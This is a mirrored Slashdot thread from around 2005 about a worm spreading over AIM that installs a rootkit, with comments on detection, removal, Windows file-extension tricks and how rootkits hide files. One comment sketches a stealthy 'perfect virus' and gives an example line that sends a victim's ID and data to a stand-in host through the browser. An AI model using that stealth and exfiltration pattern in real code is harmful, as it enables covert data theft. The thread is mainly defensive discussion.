Slashdot Mirror


Worm With Rootkit Package Loose On AIM

Mr0624 writes "According to a recent article on C|Net a new worm is swiftly spreading via AIM to many computers. It delivers a brutal root-kit which bypasses security software and takes control of a PC." From the article: "The worm was spotted in an AOL IM chatroom and infected one of the PCs that FaceTime uses for worm bait. The company said it also has seen the pest hit other computers. 'It is still out there, and it is definitely something the user should be leery of ... The rootkit is designed to not be detected, and that is the scary part.'"

25 of 438 comments (clear)

  1. Noteworthy tools by nmb3000 · · Score: 5, Informative

    I suppose that anyone in the computer tech/repair shop industry might appreciate tools like Rootkit Revealer right now.

    Hopefully Microsoft's project that hasn't been released yet will show up soon. They also have a few hints to detect rootkits installed on a system including two Slashdot links.

    Hooray for AOL.

    --
    "What do you despise? By this are you truly known." --Princess Irulan, Manual of Muad'Dib
    /)
  2. Old.. by Chickenofbristol55 · · Score: 5, Informative

    This is actually pretty old news, one of my friends got this a few weeks ago (he's not a geek, and he called me because I build this custom pc for him). It's quite easy to fix though, a good Ol' system restore fixes it, and there are many programs that can search for, and delete rootkit and other trojans (i'm talking about other programs besides antivirus programs, which sometimes have a hard time deleting these buggers). The trojan was called directX.exe, found in windows/system32 folder. My suggestion: don't click on a link from a friend before 1) you know what it is 2) and make sure that it doesn't say that your downloading a video file, when it's obviously a batch or exe file. This virus is not really a big deal, you just have to have half a brain to deal with it.

    --
    public class null extends java applet { System.out.print ("Tabula Rasa"); }
  3. Re:AIM client, or AIM protocol? by antifoidulus · · Score: 2, Informative

    Considering the rootkit is spread by users clicking links and has NOTHING at all to do with the protocol, I'd have to go ahead and have to say yeah, it can spread via any client that lets you click on links and I'd also have to say RTFA

  4. How to remove it. The answer. by TheGSRGuy · · Score: 3, Informative

    http://www.jayloden.com/VirusClean.htm

    This tool is updated almost daily. 100% effective, I can vouch for it. You can become infected if you click the link on non-AIM clients, but it won't spread to everyone else on your buddylist.

  5. Re:Only Chat room users affected? by AnamanFan · · Score: 5, Informative

    Assuming you're on a Windows operating system.

    Use of GAIM will only prevent propagation of this worm. There are more levels at play here.

    The worm is actually installed from a link you would click on from an infected IM. Nothing fancy here, it's just a simple HTML link. Clicking on this link will call up your web browser. What happens here depends on both the browser, patches, browser settings, and you. In IE, it's likely that the executable will just run it. Or, ask you to download/run said file. The latter true for Firefox or Opera as well as IE.

    In any case, if your computer runs this executable, the computer in infected and it's game over. BUT, you won't be spreading the worm to others since you're using GAIM. The spreading of the worm depends on the AIM (or AOL?) client running on the computer.

    That is until the worm writers also write for GAIM.

    --
    AnamanFan - Trying to find the Truth, one post at a time.
  6. Re:duh by killa62 · · Score: 5, Informative

    Actually, rootkits go out of their way to be undetected.
    (Shamelessly stolen from grc.com)
    "What happens is, they essentially modify the way the OS itself works. They're compromising the operating system kernel. You know, in operating system terminology we have the notion of a kernel, which is the OS core. And then you've got applications which run as sort of clients of that operating system. So a program you're running, you know, Corel Draw or Outlook or whatever, that's a client of the operating system. Well, so are the spyware scanners. So when you're running even a spyware scanner, it's saying to the operating system - in fact, for example, there are two API calls that's "find first file" and "find next file." So if you ever want to, like, do a directory listing, you'll say "find first file *.*," and it gives you the first file. And then you successively call "find next," "find next," "find next," until it returns no more files. That's all there is to it. So that's - so anything that's scanning your system is basically doing that.

    Well, imagine if something altered the way the "find first" and "find next" operated, so that it was intercepting the response back to you, out of the operating system, back to any application that was asking, so that if it was about to report one of its own files, it would call - it would say, whoops, and call "find next" again on your behalf, skipping over that file. Suddenly any program running on the operating system will not see any of those stealthed, rootkitted files. They just disappear. "

    link
    http://www.grc.com/sn/SN-009.htm

  7. Yahoo.com and Google.com by tepples · · Score: 4, Informative

    How many people still use .com files anyway?

    Yahoo.com, Google.com, Fark.com, News.com.com... Windows stores Internet shortcuts in files with the .url suffix, but even when you have "hide file extensions" turned off, Windows still hides the .url suffix, making it nearly impossible to distinguish Google.com from Google.com.url in icon view and difficult in any other view. The little arrow in the corner doesn't mean much, as the Google.com file could contain an icon with the arrow already drawn inside.

    1. Re:Yahoo.com and Google.com by wx327 · · Score: 4, Informative

      You can change these settings in explorer by going to (using the URL internet shortcut as an example):
      Tools/Folder Options/File Types/URL/Advanced/Always show extension

      Alternatively, you can edit the registry and create the following key:
      [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShort cut] (slashcode will probably insert a space somewhere in there)
      "AlwaysShowExt"=""

  8. Re:When everyone runs as root already by Mantus · · Score: 3, Informative

    Due to poor software design, it's difficult to not run ad admin. Most programs run no problem, be some, like WinAMP, need to have their directory permissions changed to run and a non-admin. While this isn't a problem for power users, most users won't even know how to change the permissions (in XP Home you need to boot into safe mode to get the security tab to appear in the file properties windows)

    Despite the fact that the \Documents and Settings\username folder exists, some developers choose not to use it, and that causes problems.

  9. 'Rootkit' detection by dedazo · · Score: 2, Informative
    OK, I have a beef with this beign called a 'rootkit'; it's really a trojan that can hide itself very well. But anyway. SysInternals has a sort-of 'rootkit' detector called Autoruns that looks at everything that is loaded on to kernel and userspace at boot time. It's extremely useful because it provides an abridged view of what your PC is running when it starts. This is not a 'clik here' end user tool - you have to know what you're looking for. But I used it a few months ago to get rid of a nasty worm on a friend's machine. Might also want to get ProcessExplorer to actually get the cleanup done.

    Or... just tell people not to download crap from 'teh interweb'.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  10. Re:A couple of hours? by mindstrm · · Score: 3, Informative

    Right then, well, "System Restore" is a feature of Windows XP that snapshots the status of a whole bucketload of system settings, DLLS, etc... each time you update software, and at other times determined by the system, these snapshots are taken. You can go into system restore and revert to your system status from yesterday, last week, or just before oyu installed something, and it generally works very well (meaning quickly, reliably, and doesn't erase your data.) It doens't make a mess, either.

    It was a very surprisingly well done feature, I can't actually believe it came from MS

  11. Some viruses DO run on WINE by killa62 · · Score: 3, Informative

    Some windows viruses do run under WINE. However, they do not affect the system to the extent that windows viruses affect windows systems. They RUN, but mostly nothing else happens other than wasting CPU cycles.

    I think this was posted on /. before.
    http://os.newsforge.com/article.pl?sid=05/01/25/14 30222&from=rss

    1. Re:Some viruses DO run on WINE by cerberusss · · Score: 2, Informative

      The article text was posted as a comment to that story.

      --
      8 of 13 people found this answer helpful. Did you?
  12. Re:hah by rm999 · · Score: 2, Informative

    In the case of AIM, I am pretty sure you have to click a link. And I stand by my opinion, regardless of what the moderators think :)

  13. Re:Wow... by oPless · · Score: 2, Informative

    Actually it's much worse.

    Administrator privs on windows is pretty much "root" as far as users are concerned *but* there is a higher level of privs. The SYSTEM user, which has a complete control (iirc, and I might not cos it's 4:30am here) it's near enough acting like the operating system as makes no difference.

    rootkits tend to get themselves to SYSTEM privs :o(

  14. FDisk in 2005? by Anonymous Coward · · Score: 3, Informative

    I had a rootkit last month. Nothing could get rid of it but a full fdisk/mbr where I lost everything. It was MBR based and would append itself when running windows which made it nearly impossible to delete.

    It's 2005 and you only tried FDisk? There's a number of free boot record editors that could have fixed anything. There is no rootkit that I know of that is based out of the MBR the way the old Pakistani virus did to Apples. If I have a customer who needs data recovered off a rootkit infected computer I put it in as a slave in a WXP or W2K system.

    1. Re:FDisk in 2005? by mstromb · · Score: 2, Informative

      Which is one of the reasons why autorun is one of the most insecure things about windows. Yay for randomly running arbitrary commands from unknown sources!

      Unfortunately, if you turn it off, anyone else using you computer becomes incredibly confused as to why windows "doesn't work".

      Also, I've run fdisk /mbr on windows xp machines in the past (fixing botched dual boot attempts), and not had an issue. As far as I know, that command simply resets the MBR to the deafult value - that is, run ntoskern or whatever on block 0 of partition 0. More or less. Or is that completely wrong?

    2. Re:FDisk in 2005? by clymere · · Score: 3, Informative

      Using a clean windows machine to fix an infected windows drive isn't all that smart in the first place. This is an area where live disks excel, Knoppix being the obvious first choice...not to mention the many variants with more specialized tools added on. You're running a different OS, its running off of read-only media, and you're risking essentially nothing.

      --
      once you go slack, you never go back
  15. Re:Only Chat room users affected? by glitch0 · · Score: 2, Informative

    They're COM files - the worm has been going around my town for about a week and a half.

    It's usually a link with something like "HEY CHECK OUT THIS PICTURE OF ME - LOLZ!! http://shittywebpage.com/funny.com"

    Since most people don't know that an COM file is executable they download and run it.

    Unlike the idiots usin AIM who've been hit with this.
    Yes, since everyone who doesn't know everything about a file extension not really in common use for many years is an idiot. Plus Windows hides extensions by default, which really doesn't help the problem.

    --
    -Glitch "We all know Linux is great...it does infinite loops in 5 seconds." - Linus Torvalds
  16. About the rootkit by nightcrawler77 · · Score: 4, Informative

    This looks like the same worm a friend of mine got a few weeks ago. I loaded it up in VMWare and discovered that it installed, among other things, the "FU" rootkit.

    I took a rootkit class at this year's Black Hat Training from the guy who wrote FU. He pointed out that it's more of a proof-of-concept rootkit. It does allow you to hide files, registry keys and drivers from both user-mode and kernel-mode processes, but, it really doesn't go out of its way to hide itself from every possible angle, so detection (and thankfully, removal) wasn't that bad.

    I was able to whip up a little app to fix it from within Windows. But had the worm's author actually expanded on FU's techniques and done a better job of hiding the rootkit, recovery would not have been as nearly as easy. (Just imagine how much fun would it be to talk a novice through Windows XP's Recovery Console!)

    Once the worm authors start to get better at exploiting the potential of rootkits, we've definitely got a much better problem on our hands. The old "1. get infected, 2. run anti-virus to disinfect, 3. repeat" cycle just won't work anymore. Good luck even finding a well-implemented rootkit once it's in your kernel, let alone trying to clean it up while it's effectively able to veto every action you take.

    (Yet another reason why no Windows user should run as an Administrator.)

    --

    "Power corrupts, and absolute power corrupts absolutely." -- Lord Acton

  17. Re:Only Chat room users affected? by Aenema · · Score: 2, Informative

    Yes. Even though its likely GAIM won't spread it, you'll still to get some spyware.
    Incase you haven't seen any instances where someone is infected the messages are usually similar to

    Wow! (http://genericwebhosting.com/XxXILikeSpreadingTro jans/cool.com)
    or
    Check this out! (http://genericblog.com/picture01.exe)

    which can only be so obvious, but, then again, the mainstream instant messaging crowds are full of dumbasses.

  18. IE and i.e. by stonedonkey · · Score: 5, Informative

    IE: The worm is a compact, surreptitious BT/Kademlia client.

    Took me a second to realize that "IE" meant "id est" and not Internet Explorer. And "id est" means "that is," not "for example," also known as e.g. (exempli gratia).

    Handy cheat sheet:

    i.e. = id est = that is (not commonly captitalized, or puncuated as an acronym like IE)

    e.g. = exempli gratia = for example

    There's your pendantic lesson of the day :p

    1. Re:IE and i.e. by PakProtector · · Score: 2, Informative
      IE: The worm is a compact, surreptitious BT/Kademlia client.
      Took me a second to realize that "IE" meant "id est" and not Internet Explorer. And "id est" means "that is," not "for example," also known as e.g. (exempli gratia).

      Handy cheat sheet:

      i.e. = id est = that is (not commonly captitalized, or puncuated as an acronym like IE)

      e.g. = exempli gratia = for example

      There's your pendantic lesson of the day :p

      Now, let me pedanticly correct you. I.e. does indeed stand for 'id est,' but 'id est' does not mean 'that is.' 'id est' is latin for 'it is.' I know this, because I speak the bloody language. Thank you.

      --

      Edward@Tomato - /home/Edward/ man woman
      man: no entry for woman in the manual.
      "Qua!?"

    2. Re:IE and i.e. by suwain_2 · · Score: 2, Informative

      This aren't "real" translations, but I find this to be easier to remember:

      i.e. = "in effect" ("in other words")
      e.g. = "example given"

      Just think of it as a handy mnemonic device as opposed to literal translations.

      --
      ________________________________________________
      suwain_2 :: quality slashdot p
  19. Re:Who of us actually would click... by glesga_kiss · · Score: 2, Informative
    And for the person who is no doubt going to ask "Well how do you know you don't have a virus if you have no virus scanning software?". Simple. If I had a virus it would have to be one that:

    - Did not affect the running of my computer negatively.

    - Did not create any network traffic.

    - Did not attempt to infect files.

    So, if I had a virus that met all of those criteria, I don't think I'd have to worry about catching it.

    How did you know that it didn't dial home? You said you had no security and no anti-virus, and that you were running natd/ipfw. Perhaps if you were also running some intrusion detection software on the firewall, or had an application-level firewall, you might actually be able to say "did not create any network traffic"? What were doing to make this assertion? Watching the blinkenlights on the hub?

    The perfect virus (nowadays) does the following:

    • Infects silently
    • Rarely dials home, and when it does it's piggybacked on another, non-suspicious protocol. E.g. "firefox http://mydodgysite?id=yourUniqueId&data=fillInHere
    • Does not inpact the day-to-day running of the PC
    • Patches the original vunerability to:
      • prevent other viruses stealing away the rooted box
      • prevent other viruses from impacting the operation of the PC (meaning it gets fixed or reinstalled)

    Don't have any programs, I MEAN ANY, which automatically run any sort of executable. That's just asking for it.

    You truely are an idiot. ALL programs can do this. It's a basic part of how programs work, they make calls to other programs! The question is, can they be made to run malware through either bad design or exploit (e.g. buffer overflow). There is NOTHING you can do against the latter. Even the infalible Firefox is currently on v1.07 because of EXPLOITS in older versions.

    The only system I can think of that can stop apps running system commands is Java. You don't seem like the Java type somehow though.

    "Don't use your firewall to do your job for you. Shut off the services you don't need."

    That's IN ADDITION to a firewall. NEVER rely on software on your PC to sort out what you have open. A virus can easilly (silently) restart a service, and you'd NEVER know. Likewise with "personal firewalls". The firewall should be a different box with different accounts. If you are truely paranoid, never enter it's password on a potentially hacked machine and stick to console access only.

    I hope you are running security for anything important...